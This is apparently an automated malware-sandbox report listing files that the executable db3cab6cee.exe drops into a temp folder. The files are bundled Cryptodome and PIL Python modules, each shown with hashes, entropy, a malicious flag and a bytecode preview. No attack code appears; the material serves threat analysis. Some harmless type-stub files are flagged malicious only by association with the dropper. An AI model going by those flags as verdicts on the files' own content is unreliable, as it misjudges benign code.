                                                                                                                                            Preview:...........e..........................T.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z.d.d...Z.d.d...Z.d...Z.d.S.)......)...load_pycryptodome_raw_lib..c_size_t..create_string_buffer..get_raw_buffer..c_uint8_ptr..is_writeable_bufferz.Cryptodome.Util._strxoray.... void strxor(const uint8_t *in1,. const uint8_t *in2,. uint8_t *out, size_t len);. void strxor_c(const uint8_t *in,. uint8_t c,. uint8_t *out,. size_t len);. Nc.....................>.....t...........|...............t...........|...............k.....r.t...........d.................|...t...........t...........|.............................}.n_|.}.t...........|...............s.t...........d.................t...........|...............t...........|...............k.....r.t...........d.t...........|.........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\strxor.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):249
                                                                                                                                            Entropy (8bit):4.800678842548869
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBXyUzrIY3MTDyQdQAY0OXW6ah05gUQdByKj0ah05gv:1REYB3vIY3YyQnrOXAh05VQ6KZh05q
                                                                                                                                            MD5:81C7899ED070F1D26338977374A4B853
                                                                                                                                            SHA1:2627B47DA19BB2F2B8E7D25A5A57473C00C86550
                                                                                                                                            SHA-256:CA7D073C74998CFFB501A2E6E1C99AF62F49272A5FDFB3527769E2A632DFE1A0
                                                                                                                                            SHA-512:CF5299A774C61A0F84D6E1E4233F426CC9D854D809EEF0D6B1158EC0078E75C54C3141E835DC3D0F376B53EFB8DDE462B49B0A5093C63613B332617966F34D0C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....def strxor(term1: bytes, term2: bytes, output: Optional[Buffer]=...) -> bytes: .....def strxor_c(term: bytes, c: int, output: Optional[Buffer]=...) -> bytes: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):621
                                                                                                                                            Entropy (8bit):5.3036329423799735
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:iF0m/HkxkOX2Dy0b/2IphJ/2btACOw3D5kUl/:iF6f0y0T2WQbuCliQ/
                                                                                                                                            MD5:9228C4F8A87CC323AF27683C6169B085
                                                                                                                                            SHA1:6B67EE595CD1436AAF69214623DCA5EF32860092
                                                                                                                                            SHA-256:8173CB929026ADF6E5CB4CF6DA8AE7D051D7D6098C42F155FD41EE9F4E3D813C
                                                                                                                                            SHA-512:81D667D883F78627EAEA79552F30FF54112730CD2A43FA7D29EC628CF778F4855EF4A930CF9475C3B280AD22D8682F740D36371693F7E42F6D165D61BEA658D8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................P.....g.d...Z.d.Z.d.......................d...e.D.............................Z.d.S.).)...Cipher..Hash..Protocol..PublicKey..Util..Signature..IO..Math).............0...c.....................,.....g.|.].}.t...........|...................S...)...str)....0..xs.... .gC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Cryptodome\__init__.py..<listcomp>r........s........5..5..5.1...A......5..5..5.....N)...__all__..version_info..join..__version__r....r....r......<module>r........sA....................................h.h..5..5....5..5..5..6..6......r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\__init__.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):103
                                                                                                                                            Entropy (8bit):4.320003818965119
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1REvgBk8J0fWQLCfcJAOLRL+2MliHovcoFQy:1REYBb0fWpcFY2MtJN
                                                                                                                                            MD5:BF77DB2C18C7E4E3E80EA7D09C2D8336
                                                                                                                                            SHA1:682ADC1869A615EBC5152E303D7F10C9DF4800C1
                                                                                                                                            SHA-256:748D33339311187C619DF8EAA40C8F1A8B4A4EB3E59DE4CDD90FA30105CD8351
                                                                                                                                            SHA-512:ADD512240AB6D99FF0B4871C7F96849267CCB8CD5BE8BAB86579D5599434266F1C4C290DF395526C694110BDD67DCDA6970CEF39416AB87798AC78914AD87EB7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple, Union....version_info : Tuple[int, int, Union[int, str]]..__version__ : str..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\BdfFontFile.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5163
                                                                                                                                            Entropy (8bit):5.51725914247784
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Wk1ouVpj0v8Wr5FFv7UXhxvLT0wrPUwSUFmA/:bNho5FFvwXhxvnIwSUF/
                                                                                                                                            MD5:150ED1965B59BF58193DE7292AE6F428
                                                                                                                                            SHA1:D474188946E09CEF0E4AB005722064EA268A6DC5
                                                                                                                                            SHA-256:8FA3FB2D36787F1E76E5EEA06FC724E263AE6E9BEE1B9717C3E6DF5BED8ACD23
                                                                                                                                            SHA-512:80706757723F5919C75B0F9B2FD194496C7E87E9609424B50D014E7018C6E44842963089DBD7FD8A02CC997FD82F9E7A4BC83D6BA1906DDBFE880F6505807EC9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................~.....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.d.d.d.d.d...Z.d.d.d.d...Z.d.d...Z...G.d...d.e.j.......................Z.d.S.).z*.Parse X Bitmap Distribution Format (BDF)......)...annotations)...BinaryIO.....)...FontFile..Image..Roman..Italic..Obliquez.Reverse Italicz.Reverse Oblique..Other)...R..I..O..RI..RO..OT..Proportional..Monospaced..Cell)...P..M..C..fr......return.qtuple[str, int, tuple[tuple[int, int], tuple[int, int, int, int], tuple[int, int, int, int]], Image.Image] | Nonec............................|.....................................}.|.s.d.S.|.d.d.............d.k.....r.n..(|.d.d.......................................................................d...............}.i.}...|.....................................}.|.r.|.d.d.............d.k.....r.nT|.......................d...............}.|.|.d.z...d...................................d...............|.|.d.|...................................d...............<....yt................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\BlpImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24704
                                                                                                                                            Entropy (8bit):5.278438167786696
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:9WQNPu4/zUYCyCJKcVyfFv0mFwrYMtTwZxxfjjhZ6it9A/ryUplOTLM1:rUx/V0cJrxtupjjH6iX3U91
                                                                                                                                            MD5:8DDAD14707A0840D3FEC8CB49A75F983
                                                                                                                                            SHA1:E5836B7226A6D6125ABA52A513C99E86F5EC68E3
                                                                                                                                            SHA-256:950A2C2D00CFEC4DE7105266A4DEDC529EBBA555B56C34DCDFEDF67B74CDA6BD
                                                                                                                                            SHA-512:EF2B001B5168F3EE740CAE9836F0E730A32656659BDBEE250A899D0797152B76C05643059190D5CF1A5B34177F2829A4954AE84B5C6B6B02B3C69BC2AB24F14A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.>........................z.....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z.d...Z.d%d...Z.d...Z.d...Z...G.d...d.e...............Z.d...Z...G.d...d.e.j.......................Z...G.d...d.e.j.......................Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e.j.......................Z.d ..Z...e.j.........e.j.........e.e...................e.j ........e.j.........d!..................e.j!........d"e...................e.j!........d#e...................e.j"........e.j.........e...................e.j#........d$e.................d.S.)&a.....Blizzard Mipmap Format (.blp).Jerome Leclanche <jerome@leclan.ch>..The contents of this file are hereby released in the public domain (CC0).Full text of the CC0 license:. https://creativecommons.org/publicdomain/zero/1.0/..BLP1 files, used mostly in Warcraft III, are not fully supported..All types of BLP2 files us

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\BmpImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17938
                                                                                                                                            Entropy (8bit):5.319016161561478
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ci3QsUMxWH1od2heOZ/qcUxF4kEbZmioPe111VruQRqGrGkhkQDympes442y9H1k:33QsUMG1odkB9q7F4kEbZnrnqmmmIs1k
                                                                                                                                            MD5:5CC70DE41B2826B1EA679A62AE4C6E37
                                                                                                                                            SHA1:D3526B0E83E4507E7754CBED1DE04A9B274B043B
                                                                                                                                            SHA-256:689C8C76FEA868C7838A0662B226D7FE4D10AF51BF114A102D48F6351C954F29
                                                                                                                                            SHA-512:D5C68EB8E2CAA269DF8A486CFA044EFEBF17ABAC0F25CE50D2E3633157E2D9430729AB99D968204B94F10C09FBF490C6BEBA740428CDEA30425DAD31F25E68C2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.F.............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.d.d.d.d.d...Z.d...Z.d...Z...G.d...d.e.j.......................Z...G.d...d.e.j.......................Z...G.d...d.e...............Z.d.d.d.d.d.d...Z.d...Z.d&d!..Z...e.j.........e.j.........e.e...................e.j.........e.j.........e...................e.j.........e.j.........d"..................e.j.........e.j.........d#..................e.j ........d$e...................e.j.........e.j.........e.e...................e.j.........e.j.........e...................e.j.........e.j.........d%..................e.j.........e.j.........d#................d.S.)'.....)...annotationsN.....)...Image..ImageFile..ImagePalette)...i16le)...i32le....o8)...o16le)...o32le)...Pz.P;1).r....z.P;4).r....r....)...RGB..BGR;15).r......BGR).r......BGRX).r......................... ...c...........................|.d.d.............d.k.....S.).N..........BM......prefixs....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\BufrStubImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2738
                                                                                                                                            Entropy (8bit):5.122324989805885
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:GevCs2lGqljTJ0OIciG4PrS3PJyeA33/A/v5BixgxVk0ZVv:nvIzhJcbjS3QkjixgxVrv
                                                                                                                                            MD5:099DF08395EF47EDAFDE857B36000650
                                                                                                                                            SHA1:E88BC1F8F262505BADE65053607EF1CDCA737A8E
                                                                                                                                            SHA-256:46E207F06B0A4F1CB53200EC1031DFAA54C569BB6BD007F85E27D04C0F49F324
                                                                                                                                            SHA-512:6AD0413A470395DD081A7383A0DC07A35CC84AD51A9E99AE9838A423DDC2082EBC5795A94BAC63D7D99A87BF656B4FBEDBF812082A204F69F3C783DA51A662FE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.d.l.m.Z...d.d.l.m.Z.m.Z...d.a.d...Z.d...Z...G.d...d.e.j.......................Z.d...Z...e.j.........e.j.........e.e...................e.j.........e.j.........e...................e.j.........e.j.........d.................d.S.)......)...annotations.....)...Image..ImageFileNc...........................|.a.d.S.).z_. Install application-specific BUFR image handler... :param handler: Handler object.. N...._handler)...handlers.... .kC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\BufrStubImagePlugin.py..register_handlerr........s............H.H.H.....c.....................:.....|.d.d.............d.k.....p.|.d.d.............d.k.....S.).N.....s....BUFRs....ZCZC..)...prefixs.... r......_acceptr.... ...s'.........".1.".:.... ..9.F.2.A.2.J.'.$9..9r....c.....................".....e.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d.S.)...BufrStubImageFile..BUFRc.....................R.....|.j........................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\ContainerIO.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4525
                                                                                                                                            Entropy (8bit):5.235031311542387
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:UAxIMZefetKCSe32UJgA4oLp8+SvAoK+mzPLLlRl:UAxnA2X3Jg5Yp8EoK+mbLLlX
                                                                                                                                            MD5:E43B0DC5B1DB49AD0D9B79717C4B7736
                                                                                                                                            SHA1:3E112B820C8325678199E385F326AB35B01BE635
                                                                                                                                            SHA-256:2596C7C10D06A151173A36F39DCDF4EF64CBC8EF01E011BBFA6C64B5A74D61BD
                                                                                                                                            SHA-512:DD21AE806141C6F35FC2A54E585DD4E85CEA50EC51341657AD293EB8A823497F44BE927460A85B9BDA1D50B10261A39848293B4BEE8578CEE9B5C2C00F3DEA97
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................Z.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.....G.d...d.e.e.........................Z.d.S.)......)...annotationsN)...IO..AnyStr..Generic..Literalc.....................Z.....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.e.j.........f.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.) ..ContainerIOzm. A file object that provides read access to a part of an existing. file (for example a TAR file).. ..file..IO[AnyStr]..offset..int..length..return..Nonec.....................r.....|.|._.........d.|._.........|.|._.........|.|._.........|.j...............................|.................d.S.).z.. Create file object... :param file: Existing file.. :param offset: Start of region, in bytes.. :param length: Size of region, in bytes.. r....N)...fh..posr....r......seek)...selfr....r....r....s.... .cC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\ContainerIO.py..__init__z.ContainerIO.__init__...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\CurImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2454
                                                                                                                                            Entropy (8bit):5.2109454325266436
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:NzQYjmrqBkV2nR5rMoxu/L0UXJSa1V8tsmPCyVgpGukJ:N0YaGBPR5rMok44Snupfc
                                                                                                                                            MD5:B4FBA20CC63B8546EBA10B1FB96FA272
                                                                                                                                            SHA1:F58EC119CCCA2B51C62EAE206E57F91C03EE812E
                                                                                                                                            SHA-256:8243D26F8848B92057C35BFD027F94A8B8BB522C85625F463EF92570A14A0597
                                                                                                                                            SHA-512:1E198769FB0C301B2D42090EE700FC7110CCB07715E42F92DCA74586C4E4EDD7FF4CF413C6EDD1A52D0F8CE4F700EB5663C4D2106BC95B78BDA485D8E48D3E72
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.j.......................Z...e.j.........e.j.........e.e...................e.j.........e.j.........d.................d.S.)......)...annotations.....)...BmpImagePlugin..Image)...i16le)...i32lec...........................|.d.d.............d.k.....S.).N.....s..........)...prefixs.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\CurImagePlugin.py.._acceptr........s..........".1.".:....$..$.....c...........................e.Z.d.Z.d.Z.d.Z.d...Z.d.S.)...CurImageFile..CURz.Windows Cursorc..........................|.j.............................................}.|.j...............................d...............}.t...........|...............s.d.}.t...........|.................d.}.t...........t...........|.d.............................D.]G}.|.j...............................d...............}.|.s.|.}..!|.d...........|.d...........k.....r.|.d

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\DcxImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2827
                                                                                                                                            Entropy (8bit):5.008292415903919
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4hZ2mMnekykPRDbPYrg05e3DkWOHC0UlYF1//w7:je8vsle3NOHHUlg//w7
                                                                                                                                            MD5:858072EF6D17C96780A1EA20022204E5
                                                                                                                                            SHA1:84AAB829034C34DC9DB791E8F3D07F268E24A7D2
                                                                                                                                            SHA-256:ED2683F4C6D503CFDDD6F7244DC0B46CF325FA842566C5D1DF20DE4E14F5B657
                                                                                                                                            SHA-512:B34027E33CCA0EC2F0E1E4891BEEE7BFB304787FEEA883D727B179DF13568C116DAFCD875193DFF0937282315C67D9782CFD1057B686F0A3AD0CCA222EC8A261
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d...Z...G.d...d.e...............Z...e.j.........e.j.........e.e...................e.j.........e.j.........d.................d.S.)......)...annotations.....)...Image)...i32le)...PcxImageFilei.h.:c.....................X.....t...........|...............d.k.....o.t...........|...............t...........k.....S.).N.....)...len..i32..MAGIC)...prefixs.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\DcxImagePlugin.py.._acceptr.... ...s#.........v.;.;.!.....4...F.....u. 4..4.....c.....................,.....e.Z.d.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d.S.)...DcxImageFile..DCXz.Intel DCXFc...........................|.j...............................d...............}.t...........|...............s.d.}.t...........|.................g.|._.........t...........d...............D.]G}.t...........|.j...............................d.............................}.|.s...n.|.j..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\DdsImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22350
                                                                                                                                            Entropy (8bit):5.765076483552427
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:emoJAY+yrOkVMm7TOxTXMFjmRZJmWzpXV9WrQGQR/ehWWWRfV:emoJAYCxGmLJ8rUe0
                                                                                                                                            MD5:B0A492702F5346FBBAEB3D2D7C356A27
                                                                                                                                            SHA1:F688F70032C33922DAD6363757BBB51F5D6CCC7D
                                                                                                                                            SHA-256:C6AED8ADFD6A890AA4791BCF23CD8C3A7413FAA60B89EE12C5DF9DA9B54B4884
                                                                                                                                            SHA-512:0BFA17B6EEA4401B40EFDF2297BCBC5F3491EFDB2E9CFB76B2291A325C1CB4B1A2DECEA48B566D79B9ADA65918D1853CDD0F77B573EA607464ECFD7E8918BB29
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.B..............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z.e.j.........e...........Z.e.D.].Z...e.e.d.e.j.........z...e.j ..........................e.D.].Z...e.e.d.e.j.........z...e.j ..........................e.D.].Z...e.e.d.e.j.........z...e.j ..........................e.D.].Z...e.e.d.e.j.........z...e.j ..........................e.j!........Z"e.j#........Z$e.j#........e.j%........z...Z&e.j'........Z(e.j'........e.j%........z...Z)e.j*........Z+e.j,........Z-e.j.........e.j/........z...e.j0........z...e.j1........z...Z2e.j3........Z4e.j5........Z6e.j7........Z8e.j9........Z:e.j/........Z;e.j0........Z<e.j=........Z>e.j?........e.j@........z...ZAe.j?........ZBe.jC........e.jD........z...ZEe.jC........e.jF........z...ZGe.jC

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\EpsImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17892
                                                                                                                                            Entropy (8bit):5.3905101963335325
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:pFiGTdGxVGqycXgOsrNF5bDlik9EGNaJMVxDS7:pFtdGHycgrNF5b53E3MV4
                                                                                                                                            MD5:1B59D120C2E4E215CE6B917FFFF92D82
                                                                                                                                            SHA1:FCB342B37519DB647B3C8E080DEE4D585CD55981
                                                                                                                                            SHA-256:E84A0D8AC7EF94B75ECC44385526FB6E198FDBCABB841406E4C0EB1753EF741C
                                                                                                                                            SHA-512:EF44D359DF57FF5029C5B8331A3D364A1040CE2A47841769C9BBBD5209E3CEFCDBD7C46A00A57BF1B4F2A9F628D5B9C56D52D02B4AB3D68EF62C8582DD1C9F33
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.@..............................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j.........d...............Z...e.j.........d...............Z.d.a.d.a.d...Z.d.d...Z...G.d...d...............Z.d...Z...G.d...d.e.j.......................Z.d.d...Z...e.j.........e.j.........e.e...................e.j.........e.j.........e...................e.j.........e.j.........d.d.g...................e.j.........e.j.........d.................d.S.)......)...annotationsN.....)...Image..ImageFile)...i32le)...deprecatez.^%%([^:]*):[ \t]*(.*)[ \t]*$z.^%[%!\w]([^:]*)[ \t]*$c.....................6.....t.............t...........j...............................d...............r3t............$d.d.l.}.d.D.].}.|.......................|.................|.a...n...d.a.t...........a.n8..t...........j.........d.d.g.t...........j...........................d.a.n.#.t...........$.r...d.a.Y.n.w.x.Y.w.t...........d.u.S.).N..winr....)...gswin32c..gswin64c..gsFr....z

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\ExifTags.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12010
                                                                                                                                            Entropy (8bit):6.148047960990948
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:wAXtO9nAy29y2JuXlh7SWPELBiQAY13FaUBc0ZkqRG+l9jdzoebQWww2bQ4UaEaI:tXtYAnq1hWtLBiQAY1V1Bc0Zkq/7dzom
                                                                                                                                            MD5:B9A668B5C4AEA2DBD4043C4ECE2AE6FC
                                                                                                                                            SHA1:87E8D6267C588190A18A28752D083E6F9E2C74B0
                                                                                                                                            SHA-256:AC06784541A94C53DF0DC1FBE23E4FCFF5E90128357BE9B6783B07EB9A36D229
                                                                                                                                            SHA-512:22945905F8E2D0B7783244DEE186589C8CEDA21DD9D0433B8124483A7A0C3D4CA9B92CB4FDFAC0424EA913D2D7A5C965BC886C657D7748762D921B84DD091604
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.'..............................d.Z.d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e...............Z...i.d...e.D.................d.d.d.d.d.d.d.....Z...G.d...d.e...............Z...d...e.D...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z.d.S.).zW.This module provides constants and clear-text names for various.well-known EXIF tags.......)...annotations)...IntEnumc.....................x.....e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d Z"d!Z#d"Z$d#Z%d$Z&d%Z'd&Z(d'Z)d(Z*d)Z+d*Z,d+Z-d,Z.d-Z/d.Z0d/Z1d0Z2d1Z3d2Z4d3Z5d4Z6d5Z7d6Z8d7Z9d8Z:d9Z;d:Z<d;Z=d<Z>d=Z?d>Z@d?ZAd@ZBdAZCdBZDdCZEdDZFdEZGdFZHdGZIdHZJdIZKdJZLdKZMdLZNdMZOdNZPdOZQdPZRdQZSdRZTdSZUdTZVdUZWdVZXdWZYdXZZdYZ[dZZ\d[Z]d\Z^d]Z_d^Z`d_Zad`ZbdaZcdbZddcZeddZfdeZgdfZhdgZidhZjdiZkdjZldkZmdlZndmZodnZpdoZqdpZrdqZsdrZtdsZudtZvduZwdvZxdwZydxZzdyZ{dzZ|d{Z}d|Z~d}Z.d~Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\FitsImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3156
                                                                                                                                            Entropy (8bit):5.324331584749101
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:zQejqofa2NkI96E2XTElE/Mz/LnT/vHrIkNZjRx7VcjJr2ht1a88xfnu333EWG1E:zQeOofnk9gT/vHrIkvDSJE1ou333BG1E
                                                                                                                                            MD5:F43F1364123E901FED3F821417520989
                                                                                                                                            SHA1:FDCCF29A7ECE106DED19953322518275F3D7447F
                                                                                                                                            SHA-256:463BAF255FF5FB826AD2347E1CC765E210CC043A2ED324F981F002AF81B15CA3
                                                                                                                                            SHA-512:B41CFA99FF55B81BFB17B01D2215A6EEDF8FAF19D50EC8322522C7E66A53EA170E0FC0608874542F2751ACD99B2CE0E56F5E6639D3523EDAA2383B0E2A453845
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z...d...Z...G.d...d.e.j.......................Z...e.j.........e.j.........e.e...................e.j.........e.j.........d.d.g.................d.S.)......)...annotationsN.....)...Image..ImageFilec...........................|.d.d.............d.k.....S.).N.....s....SIMPLE..)...prefixs.... .gC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\FitsImagePlugin.py.._acceptr........s..........".1.".:...."..".....c...........................e.Z.d.Z.d.Z.d.Z.d...Z.d.S.)...FitsImageFile..FITSc...........................i.}...|.j...............................d...............}.|.s.d.}.t...........|.................|.d.d.................................................}.|.d.k.....r.n.|.d.d...................................d...............d...............................................}.|.......................d...............r.|.d.d.................................................}.|.s&t...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\FliImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7166
                                                                                                                                            Entropy (8bit):5.103425963861818
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:dDDAAhpaXu8Kb/TFhZNJ+XcLR3/bskt5GwX+Tu7xm+CigCKZlPA7PU93G9OAOJ3R:dDDMrKb7FrfJOGxrCO6EM49OAOJ3SSSG
                                                                                                                                            MD5:C1E3423CB2C958C0DDA4F740068DEFEF
                                                                                                                                            SHA1:5B961FBF27F93D345F38EEA1025B537A1361AD69
                                                                                                                                            SHA-256:67E173D8E02415C22F577B8794473A309338957748FF810C4D89F00A5FB0D45F
                                                                                                                                            SHA-512:C0BB357D3B550854FA7A24A00C599BD9EA7ECBEBFCD42017860CAFB896F89CBCD77D0D91CA889B3DAE282FACE47FBB67808ECA5D44DCBEEE07B2764938908243
                                                                                                                                            Malicious:false
